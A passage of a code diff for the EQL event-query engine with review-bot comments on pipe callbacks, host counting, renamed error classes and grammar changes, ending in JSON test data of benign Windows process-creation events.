{key_lookup[k]: v for k, v in count_table.items()} + converter = get_type_converter(case_sensitive_table) + converted_count_table = {converter(k): v for k, v in case_sensitive_table.items()} + total = sum(tbl['count'] for tbl in converted_count_table.values()) for key, details in sorted(converted_count_table.items(), key=lambda kv: (kv[1]['count'], kv[0])): + hosts = details.pop('hosts') + if len(hosts): + details['hosts'] = list(sorted(hosts)) + details['total_hosts'] = len(hosts) + details['key'] = key details['percent'] = float(details['count']) / total next_pipe([Event(EVENT_TYPE_GENERIC, 0, details)]) - count_table.clear() next_pipe(PIPE_EOF) + + # reset state + count_table.clear() else: key = get_key(events) + insensitive_key = remove_case(key) + key_lookup.setdefault(insensitive_key, key) - count_table[key]['count'] += 1 + count_table[insensitive_key]['count'] += 1 + if host_key in events[0].data: + count_table[insensitive_key]['hosts'].add(events[0].data[host_key]) return count_tuple_callback - @pipes.add(FilterPipe) - @reducers.add(FilterPipe) def _convert_filter_pipe(self, node, next_pipe): # type: (FilterPipe, callable) -> callable check_filter = self.convert(node.expression, piped=True, scoped=True) 
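Review bot: In `count_total_callback`'s reset block, `del summary['hosts']` and `del summary['total_hosts']` raise `KeyError` as soon as one host has been seen, because those keys are only ever written to `event` (the copy taken from `summary`) and never to `summary` itself. The reset needs only `summary['count'] = 0` and `hosts[0] = set()`; drop the `if len(hosts[0]):` block with its two `del` lines. The keyed branch below does not have this problem, since it pops `hosts` out of `details` and then clears `count_table` wholesale.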
@@ -610,27 +540,24 @@ def filter_callback(events): # type: (list[Event]) -> None return filter_callback - @pipes.add(HeadPipe) - @reducers.add(HeadPipe) def _convert_head_pipe(self, node, next_pipe): # type: (HeadPipe, callable) -> callable - totals = [0] # has to be mutable because of python scoping + output_buffer = [] max_count = node.count def head_callback(events): - if totals[0] < max_count: - if events is PIPE_EOF: - totals[0] = 0 - next_pipe(PIPE_EOF) - else: - totals[0] += 1 - next_pipe(events) - if totals[0] == max_count: - next_pipe(PIPE_EOF) + if events is PIPE_EOF: + for output in output_buffer: + next_pipe(output) + next_pipe(PIPE_EOF) + + # reset state + output_buffer.clear() + else: + if len(output_buffer) < max_count: + output_buffer.append(events) return head_callback - @pipes.add(TailPipe) - @reducers.add(TailPipe) def _convert_tail_pipe(self, node, next_pipe): # type: (TailPipe, callable) -> callable output_buffer = deque(maxlen=node.count) @@ -638,15 +565,15 @@ def tail_callback(events): if events is PIPE_EOF: for output in output_buffer: next_pipe(output) - output_buffer.clear() next_pipe(PIPE_EOF) + + # reset state + output_buffer.clear() else: output_buffer.append(events) return tail_callback - @pipes.add(SortPipe) - @reducers.add(SortPipe) def _convert_sort_pipe(self, node, next_pipe): # type: (SortPipe, callable) -> callable output_buffer = [] sort_key = self._convert_key(node.arguments, scoped=True, piped=True) 
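Review bot: `head_callback` now resets with `output_buffer.clear()` on a plain list, which does not exist on Python 2 (`list.clear` arrived in 3.3); the `u"..."` literals and `super(Cls, self)` calls elsewhere in this patch suggest Python 2 is still a target, so the first PIPE_EOF would fail there. `del output_buffer[:]` behaves the same on both interpreters, while the `deque.clear()` in `tail_callback` below is fine as written. The pre-existing `output_buffer.clear()` in `_convert_sort_pipe` has the same exposure; if Python 2 support has in fact been dropped, ignore this.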
@@ -661,23 +588,25 @@ def get_converted_key(buffer_events): output_buffer.sort(key=get_converted_key) for output in output_buffer: next_pipe(output) - output_buffer.clear() next_pipe(PIPE_EOF) + + # reset state + output_buffer.clear() else: output_buffer.append(events) return sort_callback - @pipes.add(UniquePipe) - @reducers.add(UniquePipe) def _convert_unique_pipe(self, node, next_pipe): # type: (UniquePipe, callable) -> callable seen = set() get_unique_key = self._convert_key(node.arguments, scoped=True, piped=True) def unique_callback(events): if events is PIPE_EOF: - seen.clear() next_pipe(PIPE_EOF) + + # reset state + seen.clear() else: key = get_unique_key(events) if key not in seen: @@ -686,17 +615,17 @@ def unique_callback(events): return unique_callback - @pipes.add(WindowPipe) - @reducers.add(WindowPipe) - def _aggregate_time_window_pipe(self, node, next_pipe): # type: (WindowPipe, callable) -> callable - """Maintains a buffer of events in a specified time window and forwards all events in the buffer.""" - - window_buf = deque() # tuple of (timestamp, events) + def _convert_window_pipe(self, node, next_pipe): # type: (WindowPipe) -> callable + """Aggregate events over a sliding window using a buffer.""" + window_buf = deque() # tuple of (timestamp, events) timespan = self.convert(node.timespan) def time_window_callback(events): # type: (list[Event]) -> None if events is PIPE_EOF: next_pipe(PIPE_EOF) + + # reset state + window_buf.clear() else: minimum_start = events[0].time - timespan 
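Review bot: The type comment on `_convert_window_pipe` drops the second parameter: it reads `# type: (WindowPipe) -> callable` while the signature is `(self, node, next_pipe)`; use `# type: (WindowPipe, callable) -> callable` to match the other pipe converters in this file. The same omission is on `_convert_unique_count_pipe` in the next hunk (which also names `CountPipe` where the node is a `UniqueCountPipe`) and on `_reduce_count_pipe` in the hunk after that.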
@@ -706,18 +635,15 @@ def time_window_callback(events): # type: (list[Event]) -> None window_buf.append((events[0].time, events)) - # forward the entire buffer along the pipe, reversed so that events[0] exposes new information for - # unique pipe etc - for result in reversed(window_buf): + for result in window_buf: next_pipe(result[1]) next_pipe(PIPE_EOF) return time_window_callback - @pipes.add(UniqueCountPipe) - @reducers.add(UniqueCountPipe) - def _aggregate_unique_counts(self, node, next_pipe): # type: (CountPipe) -> callable + def _convert_unique_count_pipe(self, node, next_pipe): # type: (CountPipe) -> callable """Aggregate counts coming into the pipe.""" + host_key = self.host_key get_unique_key = self._convert_key(node.arguments, scoped=True, piped=True) results = OrderedDict() 
@@ -727,50 +653,78 @@ def count_unique_callback(events): # type: (list[Event]) -> None total = sum(result[0].data['count'] for result in results.values()) for result in results.values(): + hosts = result[0].data.pop('hosts') # type: set + if len(hosts) > 0: + result[0].data['hosts'] = list(sorted(hosts)) + result[0].data['total_hosts'] = len(hosts) + result[0].data['percent'] = float(result[0].data['count']) / total next_pipe(result) - results.clear() next_pipe(PIPE_EOF) + # reset state + results.clear() else: # Create a copy of these, because they can be modified events = [events[0].copy()] + events[1:] piece = events[0].data key = get_unique_key(events) + hosts = piece.pop('hosts', []) + host = piece.pop(host_key, None) count = piece.pop('count', 1) if key not in results: results[key] = events match = piece + match['hosts'] = set() match['count'] = count else: match = results[key][0].data match['count'] += count + if host: + match['hosts'].add(host) + else: + match['hosts'].update(hosts) + return count_unique_callback - @reducers.add(CountPipe) - def _aggregate_counts(self, node, next_pipe): # type: (CountPipe) -> callable + def _reduce_count_pipe(self, node, next_pipe): # type: (CountPipe) -> callable """Aggregate counts coming into the pipe.""" + host_key = self.host_key if len(node.arguments) == 0: # Counting only the total - result = {'count': 0} + result = {'key': 'totals', 'count': 0, 'hosts': set()} def count_total_aggregates(events): # type: (list[Event]) -> None if events is PIPE_EOF: - # event must be immutable, as the counter will be reset - event = {'key': 'totals', 'count': result['count']} + hosts = result.pop('hosts') # type: set + + # immutable version of result + event = result.copy() + if len(hosts) > 0: + event['hosts'] = list(sorted(hosts)) + event['total_hosts'] = len(hosts) + next_pipe([Event(EVENT_TYPE_GENERIC, 0, event)]) - result['count'] = 0 next_pipe(PIPE_EOF) + + # reset state + result['count'] = 0 + result['hosts'] = set() else: piece 
= events[0].data result['count'] += piece['count'] + if host_key in piece: + result['hosts'].add(piece[host_key]) + elif 'hosts' in piece: + results['hosts'].update(piece['hosts']) + return count_total_aggregates else: - results = defaultdict(lambda: {'count': 0}) + results = defaultdict(lambda: {'count': 0, 'hosts': set()}) def count_tuple_callback(events): # type: (list[Event]) -> None if events is PIPE_EOF: @@ -780,21 +734,30 @@ def count_tuple_callback(events): # type: (list[Event]) -> None total = sum(result['count'] for result in converted_results.values()) for key, result in sorted(converted_results.items(), key=lambda kr: (kr[1]['count'], kr[0])): + hosts = result.pop('hosts') # type: set + if len(hosts) > 0: + result['hosts'] = list(sorted(hosts)) + result['total_hosts'] = len(hosts) result['key'] = key result['percent'] = float(result['count']) / total next_pipe([Event(EVENT_TYPE_GENERIC, 0, result)]) - results.clear() next_pipe(PIPE_EOF) + + # reset state + results.clear() else: piece = events[0].data key = events[0].data['key'] key = tuple(key) if len(node.arguments) > 1 else key results[key]['count'] += piece['count'] + if host_key in piece: + results[key]['hosts'].add(piece[host_key]) + elif 'hosts' in piece: + results[key]['hosts'].update(piece['hosts']) return count_tuple_callback - @converters.add(NamedSubquery) - def _get_named_of(self, node): # type: (NamedSubquery) -> callable + def _convert_named_subquery(self, node): # type: (NamedSubquery) -> callable if node.query_type == NamedSubquery.DESCENDANT: return self._get_descendant_of(node.query) elif node.query_type == NamedSubquery.CHILD: 
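Review bot: In `count_total_aggregates` the `elif 'hosts' in piece:` branch updates `results['hosts']`, but the dictionary for the no-argument case is `result`; `results` is only assigned in the `else` branch of `_reduce_count_pipe`, so inside this closure it is an unbound free variable and the first reduced piece that carries a `hosts` list raises `NameError`. Change the line to `result['hosts'].update(piece['hosts'])`. The keyed branch in the following hunk uses `results[key]['hosts']` correctly, which is likely where the extra letter came from.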
@@ -826,7 +789,7 @@ def update_descendants(event): # type: (Event) -> None dead_processes.clear() - if subtype in creates and event.data.get('pid') == 4 and event.data.get('process_name') == "System": + if subtype in creates and pid == 4 and event.data.get('process_name') == "System": # Reset all state on a sensor or machine boot up descendants.clear() sources.clear() @@ -842,8 +805,9 @@ def update_descendants(event): # type: (Event) -> None @self.event_callback(node.event_type) def check_ancestor(event): # type: (Event) -> None pid = event.data.get('pid', 0) - if pid != 0 and ancestor_match(event): - sources.add(event.data.get(self.pid_key)) + pid_key = event.data.get(self.pid_key) + if pid != 0 and ancestor_match(event) and pid_key: + sources.add(pid_key) def check_if_descendant(scope): # type: (Scope) -> bool return scope.event.data.get(self.pid_key) in descendants @@ -872,7 +836,7 @@ def update_children(event): # type: (Event) -> None dead_processes.clear() - if subtype in creates and event.data.get('pid') == 4 and event.data.get('process_name') == "System": + if subtype in creates and pid == 4 and event.data.get('process_name') == "System": # Reset all state on a sensor or machine boot up children.clear() parents.clear() @@ -888,10 +852,11 @@ def update_children(event): # type: (Event) -> None @self.event_callback(node.event_type) def match_processes(event): # type: (Event) -> None pid = event.data.get('pid', 0) - if pid != 0 and process_match(event): - parents.add(event.data.get(self.pid_key)) + pid_key = event.data.get(self.pid_key) + if pid != 0 and process_match(event) and pid_key: + parents.add(pid_key) - def check_if_child(scope): # type: (Scope) -> None + def check_if_child(scope): # type: (Scope) -> bool return scope.event.data.get(self.pid_key) in children return check_if_child 
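Review bot: In `check_ancestor` the local `pid_key = event.data.get(self.pid_key)` holds a process identifier value, not a key name, which is easy to misread right next to `self.pid_key`; a name such as `unique_pid` or `pid_value` would be clearer. The added `and pid_key` guard also discards any identifier that is falsy, so if the configured key can legitimately be `0`, test `pid_value is not None` instead. The same pattern appears in `match_processes` in the `@@ -888` hunk and again in the `@@ -926` hunk of the next chunk.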
@@ -914,7 +879,7 @@ def purge_on_terminate(event): # type: (Event) -> None dead_processes.clear() - if subtype in creates and event.data.get('pid') == 4 and event.data.get('process_name') == "System": + if subtype in creates and pid == 4 and event.data.get('process_name') == "System": # Reset all state on a sensor or machine boot up processes.clear() @@ -926,15 +891,15 @@ def purge_on_terminate(event): # type: (Event) -> None @self.event_callback(node.event_type) def match_processes(event): # type: (Event) -> None pid = event.data.get('pid', 0) - if pid != 0 and process_match(event): - processes.add(event.data.get(self.pid_id)) + pid_key = event.data.get(self.pid_key) + if pid != 0 and process_match(event) and pid_key: + processes.add(pid_key) - def check_for_match(scope): # type: (Scope) -> None + def check_for_match(scope): # type: (Scope) -> bool return scope.event.data.get(self.pid_key) in processes return check_for_match - @converters.add(EventQuery) def _convert_event_query(self, node): # type: (EventQuery) -> callable check_match = self.convert(node.query, scoped=True) expected_type = node.event_type @@ -947,7 +912,6 @@ def match_event_callback(event): # type: (Event) -> bool else: return match_event_callback - @converters.add(Join) def _convert_join(self, node, next_pipe): # type: (Join, callable) -> callable size = len(node.queries) lookup = defaultdict(lambda: [None] * size) # type: dict[object, list[Event]] @@ -1022,11 +986,9 @@ def finish_sequence(event): # type: (Event) -> None sequence.append(event) next_pipe(sequence) - @converters.add(TimeRange) - def _convert_range(self, node): - return int(node.delta.total_seconds() * self._time_unit) + def _convert_time_range(self, node): + return int(node.delta.total_seconds() * self.time_unit) - @converters.add(Sequence) def _convert_sequence(self, node, next_pipe): # type: (Sequence, callable) -> callable # Two lookups can help avoid unnecessary calls size = len(node.queries) 
@@ -1108,7 +1070,6 @@ def sort_results(events): # type: (list[Event]) -> None self._query_multiple_events = prev_query_value return output_pipe - @converters.add(PipedQuery) def _convert_piped_query(self, node, output_pipe=None): # type: (PipedQuery, callable) -> callable base_query = node.first @@ -1166,7 +1127,7 @@ def add_post_processor(self, query, analytic_id=None, output_pipe=None, query_mu def add_reducer(self, query, analytic_id=None, output_pipe=None): """Reduce the output from multiple queries. - :param PipedQuery|EqlAnalytic query: The analytic to extra the reuce logic from + :param PipedQuery|EqlAnalytic query: The analytic to extra the reduce logic from :param str analytic_id: Optional analytic_id to add to AnalyticOutput results :param callable output_pipe: Next pipe to reduce to """ diff --git a/eql/engines/__init__.py b/eql/engines/__init__.py deleted file mode 100644 index 19c783b..0000000 --- a/eql/engines/__init__.py +++ /dev/null @@ -1,11 +0,0 @@ -"""Base analytic engine code and renderers.""" -from .base import Event, AnalyticOutput, TextEngine, BaseTranspiler -from .native import PythonEngine - -__all__ = ( - "Event", - "AnalyticOutput", - "TextEngine", - "PythonEngine", - "BaseTranspiler", -) diff --git a/eql/errors.py b/eql/errors.py index c8fdf53..48f6f47 100644 --- a/eql/errors.py +++ b/eql/errors.py @@ -4,8 +4,12 @@ __all__ = ( "EqlError", - "ParseError", - "SchemaError" + "EqlParseError", + "EqlCompileError", + "EqlSchemaError", + "EqlSyntaxError", + "EqlSemanticError", + "EqlTypeMismatchError", ) 
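Review bot: The `add_reducer` docstring fix corrects "reuce" but leaves the other typo on the same line, which still reads "The analytic to extra the reduce logic from". Suggest `:param PipedQuery|EqlAnalytic query: The analytic to extract the reduce logic from`.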
@@ -13,22 +17,42 @@ class EqlError(Exception): """Base class for EQL errors.""" -class ParseError(EqlError): +class EqlCompileError(EqlError): + """Base exception class for compiling EQL to other languages.""" + + +class EqlParseError(EqlError): """EQL Parsing Error.""" - template = "Error at ({}:{}) {}:\n{}\n{}^" + template = u"Error at line:{},column:{}\n{}\n{}\n{}" - def __init__(self, error_msg, line, column, source): + def __init__(self, error_msg, line, column, source, width=1, trailer=None): """Create error.""" self.error_msg = error_msg self.line = line self.column = column self.source = source + self.trailer = trailer leading = re.sub(r'[^\t]', ' ', source)[:column] - message = self.template.format(line + 1, column + 1, error_msg, source, leading) - self.message = message - super(ParseError, self).__init__(message) + self.caret = leading + ("^" * width) + message = self.template.format(line + 1, column + 1, error_msg, source, self.caret) + if trailer: + message += "\n" + trailer + + super(EqlParseError, self).__init__(message) + + +class EqlSyntaxError(EqlParseError): + """Error with EQL syntax.""" + + +class EqlSemanticError(EqlParseError): + """Error with EQL semantics.""" + + +class EqlSchemaError(EqlSemanticError): + """Error for missing fields.""" -class SchemaError(ParseError): - """Error for unknown event types.""" +class EqlTypeMismatchError(EqlSemanticError): + """Error when validating types.""" diff --git a/eql/etc/eql.ebnf b/eql/etc/eql.ebnf index bd67142..40734a2 100644 --- a/eql/etc/eql.ebnf +++ b/eql/etc/eql.ebnf @@ -6,6 +6,9 @@ start = single_query; +cli_query = @:piped_query [';'] $; + + piped_query::PipedQuery = | query:base_query pipes:[pipe_chain] 
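Review bot: `ParseError` and `SchemaError` are renamed to `EqlParseError` and `EqlSchemaError` (and dropped from `__all__` in the preceding hunk) with no aliases left behind, so any caller that does `except ParseError:` now sees an unhandled exception where it previously handled one. If external code is expected to keep working across this change, add `ParseError = EqlParseError` and `SchemaError = EqlSchemaError` at the end of the module; if the break is intended, it belongs in the commit message. `EqlSchemaError` now derives from `EqlSemanticError`, which is still an `EqlParseError`, so handlers written against the parse-error base continue to catch it; the new `width` and `trailer` keyword arguments on `__init__` are backward-compatible.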
@@ -66,13 +69,13 @@ by_values event_query::EventQuery = - [event_type:ident 'where' ~ ] cond:expression + [event_type:ident 'where' ~ ] cond:root_expression ; macro::Macro = - 'macro' ~ name:ident '(' params:params')' body:expression + 'macro' ~ name:ident '(' params:params')' body:root_expression ; const::Constant @@ -93,20 +96,29 @@ definition definitions = {definition} $; single_definition = definition $; single_query = piped_query $; -single_expression = expression $; +single_expression = root_expression $; +single_atom = atom $; +root_expression::RootExpression + = expr:expression + ; + expression = | or_expr | subexpression ; +# Add check for missing parenthesis +check_paren::CheckParentheses + = + '(' ~ expr:expression ')' + ; or_expr::OrTerms = terms+:subexpression {'or' ~ terms+:subexpression}+; - subexpression = | and_expr @@ -144,7 +156,7 @@ in_set::InSet # Operators equals::Equals = '==' | '='; -comparator = @:('<=' | '<' | equals | '!=' | '>=' | '>'); +comparator::Comparator = comp:('<=' | '<' | equals | '!=' | '>=' | '>'); value @@ -152,6 +164,7 @@ value | function_call | named_subquery | check_paren + | atom ; function_call::FunctionCall @@ -159,15 +172,10 @@ function_call::FunctionCall name:ident '(' ~ args:[expressions] ')' ; -check_paren - = - | '(' ~ @:expression ')' - | atom - ; - atom = + | time_unit | literal | field ; @@ -181,19 +189,26 @@ expressions argument = expression; +subquery_type::SubqueryType + = name:ident 'of' ~; + named_subquery::NamedQuery - = name:ident 'of' ~ query:subquery; + = stype:subquery_type query:subquery; field::Field = - base:ident sub_fields:{sub_field} + base:ident sub_fields:{attribute | array_index} + ; + +attribute::Attribute + = '.' attr:ident ; -sub_field + +array_index::ArrayIndex = - | '.' @:ident - | '[' @:unsigned_integer ']' + '[' value:unsigned_integer ']' ; diff --git a/eql/etc/schema.json b/eql/etc/schema.json deleted file mode 100644 index d5e3b97..0000000 --- a/eql/etc/schema.json +++ /dev/null 
@@ -1,11 +0,0 @@ -{ - "event_types": [ - "dns", - "file", - "network", - "process", - "registry", - "security", - "image_load" - ] -} \ No newline at end of file diff --git a/eql/etc/test_data.json b/eql/etc/test_data.json new file mode 100644 index 0000000..90fab7e --- /dev/null +++ b/eql/etc/test_data.json 
@@ -0,0 +1,2080 @@ +[ + { + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "opcode": 3, + "pid": 0, + "process_name": "System Idle Process", + "serial_event_id": 1, + "subtype": "create", + "timestamp": 116444736000000000, + "unique_pid": 1 + }, + { + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "opcode": 3, + "parent_process_name": "System Idle Process", + "pid": 4, + "process_name": "System", + "serial_event_id": 2, + "subtype": "create", + "timestamp": 131485996510000000, + "unique_pid": 2, + "unique_ppid": 1, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "\\SystemRoot\\System32\\smss.exe", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "63d3c30b497347495b8ea78a38188969", + "opcode": 3, + "parent_process_name": "System", + "pid": 284, + "ppid": 4, + "process_name": "smss.exe", + "process_path": "C:\\Windows\\System32\\smss.exe", + "serial_event_id": 3, + "subtype": "create", + "timestamp": 131485996510000000, + "unique_pid": 3, + "unique_ppid": 2, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "60c2862b4bf0fd9f582ef344c2b1ec72", + "opcode": 3, + "pid": 372, + "ppid": 364, + "process_name": "csrss.exe", + "process_path": "C:\\Windows\\System32\\csrss.exe", + "serial_event_id": 4, + "subtype": "create", + "timestamp": 131485996510000000, + "unique_pid": 4, + "unique_ppid": 0, + "user_domain": 
"NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "wininit.exe", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "94355c28c1970635a31b3fe52eb7ceba", + "opcode": 3, + "pid": 424, + "ppid": 364, + "process_name": "wininit.exe", + "process_path": "C:\\Windows\\System32\\wininit.exe", + "serial_event_id": 5, + "subtype": "create", + "timestamp": 131485996510000000, + "unique_pid": 5, + "unique_ppid": 0, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "60c2862b4bf0fd9f582ef344c2b1ec72", + "opcode": 3, + "pid": 436, + "ppid": 416, + "process_name": "csrss.exe", + "process_path": "C:\\Windows\\System32\\csrss.exe", + "serial_event_id": 6, + "subtype": "create", + "timestamp": 131485996510000000, + "unique_pid": 6, + "unique_ppid": 0, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "winlogon.exe", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "1151b1baa6f350b1db6598e0fea7c457", + "opcode": 3, + "pid": 472, + "ppid": 416, + "process_name": "winlogon.exe", + "process_path": "C:\\Windows\\System32\\winlogon.exe", + "serial_event_id": 7, + "subtype": "create", + "timestamp": 131485996510000000, + "unique_pid": 7, + "unique_ppid": 0, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "C:\\Windows\\system32\\services.exe", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": 
"process_event", + "md5": "24acb7e5be595468e3b9aa488b9b4fcb", + "opcode": 3, + "parent_process_name": "wininit.exe", + "parent_process_path": "C:\\Windows\\System32\\wininit.exe", + "pid": 524, + "ppid": 424, + "process_name": "services.exe", + "process_path": "C:\\Windows\\System32\\services.exe", + "serial_event_id": 8, + "subtype": "create", + "timestamp": 131485996520000000, + "unique_pid": 8, + "unique_ppid": 5, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "C:\\Windows\\system32\\lsass.exe", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "7554a1b82b4a222fd4cc292abd38a558", + "opcode": 3, + "parent_process_name": "wininit.exe", + "parent_process_path": "C:\\Windows\\System32\\wininit.exe", + "pid": 536, + "ppid": 424, + "process_name": "lsass.exe", + "process_path": "C:\\Windows\\System32\\lsass.exe", + "serial_event_id": 9, + "subtype": "create", + "timestamp": 131485996520000000, + "unique_pid": 9, + "unique_ppid": 5, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "C:\\Windows\\system32\\lsm.exe", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "9662ee182644511439f1c53745dc1c88", + "opcode": 3, + "parent_process_name": "wininit.exe", + "parent_process_path": "C:\\Windows\\System32\\wininit.exe", + "pid": 544, + "ppid": 424, + "process_name": "lsm.exe", + "process_path": "C:\\Windows\\System32\\lsm.exe", + "serial_event_id": 10, + "subtype": "create", + "timestamp": 131485996520000000, + "unique_pid": 10, + "unique_ppid": 5, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "C:\\Windows\\system32\\svchost.exe -k DcomLaunch", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "c78655bc80301d76ed4fef1c1ea40a7d", + "opcode": 3, + "parent_process_name": 
"services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 648, + "ppid": 524, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 11, + "subtype": "create", + "timestamp": 131485996520000000, + "unique_pid": 11, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "\"C:\\Program Files\\VMware\\VMware Tools\\vmacthlp.exe\"", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "3c4d41c4f8cdd2ca945e91a61e6cfbaf", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 708, + "ppid": 524, + "process_name": "vmacthlp.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmacthlp.exe", + "serial_event_id": 12, + "subtype": "create", + "timestamp": 131485996520000000, + "unique_pid": 12, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "C:\\Windows\\system32\\svchost.exe -k RPCSS", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "c78655bc80301d76ed4fef1c1ea40a7d", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 752, + "ppid": 524, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 13, + "subtype": "create", + "timestamp": 131485996520000000, + "unique_pid": 13, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "NETWORK SERVICE" + }, + { + "command_line": "\"LogonUI.exe\" /flags:0x0", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "715f03b4c7223349768013ea95d9e5b7", + "opcode": 3, + "parent_process_name": "winlogon.exe", + 
"parent_process_path": "C:\\Windows\\System32\\winlogon.exe", + "pid": 828, + "ppid": 472, + "process_name": "LogonUI.exe", + "process_path": "C:\\Windows\\System32\\LogonUI.exe", + "serial_event_id": 14, + "subtype": "create", + "timestamp": 131485996520000000, + "unique_pid": 14, + "unique_ppid": 7, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "c78655bc80301d76ed4fef1c1ea40a7d", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 848, + "ppid": 524, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 15, + "subtype": "create", + "timestamp": 131485996520000000, + "unique_pid": 15, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "LOCAL SERVICE" + }, + { + "command_line": "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "c78655bc80301d76ed4fef1c1ea40a7d", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 896, + "ppid": 524, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 16, + "subtype": "create", + "timestamp": 131485996520000000, + "unique_pid": 16, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "C:\\Windows\\system32\\svchost.exe -k netsvcs", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "c78655bc80301d76ed4fef1c1ea40a7d", + "opcode": 3, + "parent_process_name": "services.exe", + 
"parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 924, + "ppid": 524, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 17, + "subtype": "create", + "timestamp": 131485996520000000, + "unique_pid": 17, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "C:\\Windows\\system32\\svchost.exe -k LocalService", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "c78655bc80301d76ed4fef1c1ea40a7d", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 264, + "ppid": 524, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 18, + "subtype": "create", + "timestamp": 131485996530000000, + "unique_pid": 18, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "LOCAL SERVICE" + }, + { + "command_line": "C:\\Windows\\system32\\svchost.exe -k NetworkService", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "c78655bc80301d76ed4fef1c1ea40a7d", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 968, + "ppid": 524, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 19, + "subtype": "create", + "timestamp": 131485996530000000, + "unique_pid": 19, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "NETWORK SERVICE" + }, + { + "command_line": "C:\\Windows\\System32\\spoolsv.exe", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "b96c17b5dc1424d56eea3a99e97428cd", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": 
